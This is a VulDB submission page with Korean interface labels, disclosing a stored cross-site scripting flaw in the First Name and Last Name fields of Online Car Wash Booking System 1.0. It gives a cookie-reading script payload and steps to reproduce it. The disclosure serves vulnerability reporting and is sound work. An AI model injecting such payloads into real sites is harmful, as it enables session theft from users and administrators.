| 제목 | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| 설명 | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
`
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows to inject Arbitrary JavaScript in Edit in "First Name" and "Last Name".
`
Payload used:-
<script>confirm (document.cookie)</script>
`
Parameter":-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
`
Steps to reproduce:-
1. Login into your admin account
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add an new user
3. In that "First Name" and " Last Name " parameter put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| 사용자 | Anonymous User |
|---|
| 제출 | 2024. 05. 25. PM 03:19 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 05. 25. PM 08:27 (5 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|